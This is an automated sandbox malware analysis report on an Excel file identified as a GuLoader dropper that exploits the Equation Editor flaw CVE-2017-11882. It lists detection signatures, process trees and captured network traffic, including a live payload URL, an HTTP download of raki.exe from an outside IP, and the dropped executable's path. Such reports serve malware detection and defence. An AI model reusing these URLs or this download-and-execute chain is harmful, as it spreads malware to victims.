Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7027521.xlsx

Overview

General Information

Sample Name:7027521.xlsx
Analysis ID:560280
MD5:e96baf78f2a98321ae47d4d82e608124
SHA1:e9ea3b397b7c2d5be07845745f621aef0d8d4db0
SHA256:180125c408724bb6ef0037c028439058d6f0b8326b679e02d7cba8d24461c3bf
Tags:VelvetSweatshopxlsx
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Binary contains a suspicious time stamp
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 584 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1352 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 800 cmdline: "C:\Users\Public\vbc.exe" MD5: 0DCB37FF90B93B7A3225707B1AF111B8)
  • cleanup
{"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
SourceRuleDescriptionAuthorStrings
00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 50.16.4.125, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1352, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1352, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1352, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 800
    Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1352, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 800

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://dariamob.ro/wed/eee_XScUCMEVL47."}
    Source: 7027521.xlsxVirustotal: Detection: 48%Perma Link
    Source: 7027521.xlsxMetadefender: Detection: 23%Perma Link
    Source: 7027521.xlsxReversingLabs: Detection: 44%
    Source: http://50.16.4.125/E/raki.exeAvira URL Cloud: Label: malware
    Source: http://50.16.4.125/E/raki.exeVirustotal: Detection: 9%Perma Link

    Exploits

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,4_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 50.16.4.125:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 60MB

    Networking

    barindex
    Source: Malware configuration extractorURLs: https://dariamob.ro/wed/eee_XScUCMEVL47.
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 26 Jan 2022 09:40:54 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.14Last-Modified: Wed, 26 Jan 2022 04:12:20 GMTETag: "29888-5d6746870006c"Accept-Ranges: bytesContent-Length: 170120Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 7c 04 03 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 c8 d5 00 00 00 00 00 00 00 00 00 00 f0 83 02 00 98 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 c8 d5 00 00 00 c0 04 00 00 d6 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: global trafficHTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: unknownTCP traffic detected without corresponding DNS query: 50.16.4.125
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: vbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: vbc.exe.2.dr, raki[1].exe.2.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2864187B.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /E/raki.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.16.4.125Connection: Keep-Alive
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_004056DE

    System Summary

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040755C4_2_0040755C
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406D854_2_00406D85
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF4_2_73191BFF
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: raki[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: 7027521.xlsxVirustotal: Detection: 48%
    Source: 7027521.xlsxMetadefender: Detection: 23%
    Source: 7027521.xlsxReversingLabs: Detection: 44%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$7027521.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE8A9.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.winXLSX@4/24@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,4_2_004021AA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_0040498A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: secur32.pdb source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdb source: sxsstore.dll.4.dr
    Source: Binary string: secur32.pdbUGP source: secur32.dll.4.dr
    Source: Binary string: SxsStore.pdbGCTL source: sxsstore.dll.4.dr

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 4_2_731930C0 push eax; ret 4_2_731930EE
    Source: secur32.dll.4.drStatic PE information: section name: .didat
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_73191BFF
    Source: secur32.dll.4.drStatic PE information: 0xAEC0B68B [Mon Nov 27 15:00:27 2062 UTC]
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\secur32.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2584Thread sleep time: -300000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sxsstore.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C49
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406873 FindFirstFileW,FindClose,4_2_00406873
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4530
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-4686
    Source: vbc.exe, 00000004.00000002.680174022.00000000005CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_73191BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,4_2_73191BFF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
